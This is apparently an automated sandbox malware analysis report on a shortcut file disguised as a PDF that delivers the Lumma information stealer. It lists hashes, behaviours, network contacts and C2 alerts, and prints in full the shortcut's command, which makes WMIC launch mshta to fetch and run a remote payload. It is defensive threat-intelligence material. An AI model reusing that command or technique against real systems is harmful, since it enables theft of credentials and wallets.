File name:	Instruction_18112.pdf.lnk
Full analysis:	https://app.any.run/tasks/344d4914-f368-4bda-bdec-76af9c23b662
Verdict:	Malicious activity
Threats:	Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	November 16, 2024, 00:09:29
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	susp-powershell lumma stealer
Indicators:
MIME:	application/x-ms-shortcut
File info:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", MachineID odafa KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Tue Mar 12 20:03:35 2024, atime=Mon Jun 17 13:07:55 2024, mtime=Tue Mar 12 20:03:35 2024, length=471040, window=showminnoactive, IDListSize 0x0187, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\wbem\WMIC.exe"
MD5:	CDBF2DB8C078C2964D02C7518E3BED81
SHA1:	66AE47E712140F12B25AB027458035ADBF366B44
SHA256:	7EC8D5588CEEC6A3D1242B5F6127D56E50D91AFD33241DAA248B4A797CF8DA19
SSDEEP:	48:88nSJOJjuCf6eHeBsNdo9aQm2V2h5W3b:88nSJAf6eksoJY

Flags:	IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes:	Archive
CreateDate:	2024:03:12 20:03:35+00:00
AccessDate:	2024:06:17 13:07:55+00:00
ModifyDate:	2024:03:12 20:03:35+00:00
TargetFileSize:	471040
IconIndex:	11
RunWindow:	Show Minimized No Activate
HotKey:	(none)
TargetFileDOSName:	WMIC.exe
DriveType:	Fixed Disk
DriveSerialNumber:	5823-95DD
VolumeLabel:	System
LocalBasePath:	C:\Windows\System32\wbem\WMIC.exe
Description:	Instruction_18112.pdf
RelativePath:	..\..\..\..\..\..\..\Windows\System32\wbem\WMIC.exe
CommandLineArguments:	/namespace:\\root\cimv2 path Win32_Process call Create "mshta https://cdn-defac18.artcollective-snapclick.com/api/reg/update.json"
IconFileName:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
MachineID:	odafa


(PID) Process:	(860) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:
(PID) Process:	(860) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(860) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:
(PID) Process:	(6236) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:	write	Name:	{2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF
Value: 010000000000000020F244D8BB37DB01
(PID) Process:	(2464) dllhost.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:	write	Name:	SlowContextMenuEntries
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000

PID	Process	Filename		Type
860	mshta.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12		der
		MD5:67E486B2F148A3FCA863728242B6273E	SHA256:FACAF1C3A4BF232ABCE19A2D534E495B0D3ADC7DBE3797D336249AA6F70ADCFB
860	mshta.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12		binary
		MD5:89FCB35219CC1B8E23CC49E8927C718F	SHA256:3C61250F62B27DC905E5706098CBE46752C1605B96E61AA9203922B5B56B04F9
6236	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IADZ0U21077H0JD6B4XX.temp		binary
		MD5:C1ACA00C1DBA07C4BC0201F983121572	SHA256:266D6B11EDEC0513C60E40E5F32D0877511E62950A0521C901E819F767D3900E
5832	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0osouae4.03z.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5832	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive		binary
		MD5:FD07DE103F02BD53166A0A85265F32C3	SHA256:793330A32801BE5725C51A5F10888C94FEB1AF97D0F8F68EF6DFCB4C363F2F63
860	mshta.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\update[1].json		executable
		MD5:E38CE05BA4D0D45AA2046092A2B48A8A	SHA256:57E31D0943AD06AC6C89628AC9DDB5817274AB1C938C64BF3FD3A9EA1F8CFD63
6236	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms		binary
		MD5:C1ACA00C1DBA07C4BC0201F983121572	SHA256:266D6B11EDEC0513C60E40E5F32D0877511E62950A0521C901E819F767D3900E
6236	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fqaadz4m.ga0.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6236	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_shqbqdkd.wn3.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6236	powershell.exe	C:\Users\admin\AppData\Local\Temp\a05db3da-2429-4b3d-966f-197d3546dd60.zip		compressed
		MD5:AF4005FACE8C61382C1EE957D7BE7F8A	SHA256:7BDE9E3490FAD17F786039FDBC0B965EEA6A78A798448777BC379CC90CFA1F04

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
860	mshta.exe	GET	200	216.58.206.67:80	http://c.pki.goog/r/r4.crl	unknown	—	—	whitelisted
5488	MoUsoCoreWorker.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
1168	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
5488	MoUsoCoreWorker.exe	GET	200	23.32.238.145:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
4208	backgroundTaskHost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D	unknown	—	—	whitelisted
4360	SearchApp.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D	unknown	—	—	whitelisted
1880	svchost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
860	mshta.exe	GET	200	216.58.206.67:80	http://c.pki.goog/r/gsr1.crl	unknown	—	—	whitelisted
1168	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
6944	svchost.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
5488	MoUsoCoreWorker.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
7048	RUXIMICS.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
860	mshta.exe	104.21.78.162:443	cdn-defac18.artcollective-snapclick.com	CLOUDFLARENET	—	unknown
860	mshta.exe	216.58.206.67:80	c.pki.goog	GOOGLE	US	whitelisted
4360	SearchApp.exe	104.126.37.178:443	www.bing.com	Akamai International B.V.	DE	whitelisted
4360	SearchApp.exe	192.229.221.95:80	ocsp.digicert.com	EDGECAST	US	whitelisted
1880	svchost.exe	20.190.159.73:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted

Domain	IP	Reputation
settings-win.data.microsoft.com	51.124.78.146 40.127.240.158 4.231.128.59	whitelisted
google.com	142.250.181.238	whitelisted
cdn-defac18.artcollective-snapclick.com	104.21.78.162 172.67.223.193	unknown
c.pki.goog	216.58.206.67	whitelisted
www.bing.com	104.126.37.178 104.126.37.171 104.126.37.161 104.126.37.163 104.126.37.131 104.126.37.170 104.126.37.136 104.126.37.152 104.126.37.153	whitelisted
ocsp.digicert.com	192.229.221.95	whitelisted
login.live.com	20.190.159.73 40.126.31.69 20.190.159.23 20.190.159.4 20.190.159.75 40.126.31.73 20.190.159.0 20.190.159.64	whitelisted
th.bing.com	104.126.37.163 104.126.37.186 104.126.37.131 104.126.37.155 104.126.37.168 104.126.37.171 104.126.37.137 104.126.37.139 104.126.37.170	whitelisted
pub.foodie-safari.shop	188.114.96.3 188.114.97.3	unknown
go.microsoft.com	23.218.210.69	whitelisted

PID	Process	Class	Message
2172	svchost.exe	Domain Observed Used for C2 Detected	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fleez-inc .sbs)
3864	rundll32.exe	Domain Observed Used for C2 Detected	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fleez-inc .sbs in TLS SNI)
2172	svchost.exe	Domain Observed Used for C2 Detected	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thicktoys .sbs)
2172	svchost.exe	Domain Observed Used for C2 Detected	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pull-trucker .sbs)
3864	rundll32.exe	Domain Observed Used for C2 Detected	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pull-trucker .sbs in TLS SNI)
2172	svchost.exe	Domain Observed Used for C2 Detected	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bored-light .sbs)
3864	rundll32.exe	Domain Observed Used for C2 Detected	ET MALWARE Observed Win32/Lumma Stealer Related Domain (bored-light .sbs in TLS SNI)
2172	svchost.exe	Domain Observed Used for C2 Detected	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (3xc1aimbl0w .sbs)
2172	svchost.exe	Domain Observed Used for C2 Detected	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (300snails .sbs)
2172	svchost.exe	Domain Observed Used for C2 Detected	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crib-endanger .sbs)

General Info

Instruction_18112.pdf.lnk

CDBF2DB8C078C2964D02C7518E3BED81

66AE47E712140F12B25AB027458035ADBF366B44

7EC8D5588CEEC6A3D1242B5F6127D56E50D91AFD33241DAA248B4A797CF8DA19

48:88nSJOJjuCf6eHeBsNdo9aQm2V2h5W3b:88nSJAf6eksoJY

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Changes powershell execution policy (Unrestricted)

Run PowerShell with an invisible window

Uses AES cipher (POWERSHELL)

Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

Changes powershell execution policy (RemoteSigned)

Downloads the requested resource (POWERSHELL)

Executing a file with an untrusted certificate

Known privilege escalation attack

Connects to the CnC server

LUMMA has been detected (SURICATA)

SUSPICIOUS

Executed via WMI

Executes script without checking the security policy

Probably obfuscated PowerShell command line is found

The process bypasses the loading of PowerShell profile settings

Process drops legitimate windows executable

Executable content was dropped or overwritten

Starts a new process with hidden mode (POWERSHELL)

Starts CMD.EXE for commands execution

Starts POWERSHELL.EXE for commands execution

Base64-obfuscated command line is found

BASE64 encoded PowerShell command has been detected

Writes data into a file (POWERSHELL)

Writes data to a memory stream (POWERSHELL)

The process drops C-runtime libraries

Creates new GUID (POWERSHELL)

Contacting a server suspected of hosting an CnC

Starts itself from another location

Cryptography encrypted command line is found

INFO

Reads security settings of Internet Explorer

Gets data length (POWERSHELL)

The executable file from the user directory is run by the Powershell process

Found Base64 encoded file access via PowerShell (YARA)

Reads Internet Explorer settings

Checks proxy server information

The process uses the downloaded file

Malware configuration

Static information

TRiD

EXIF

LNK

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules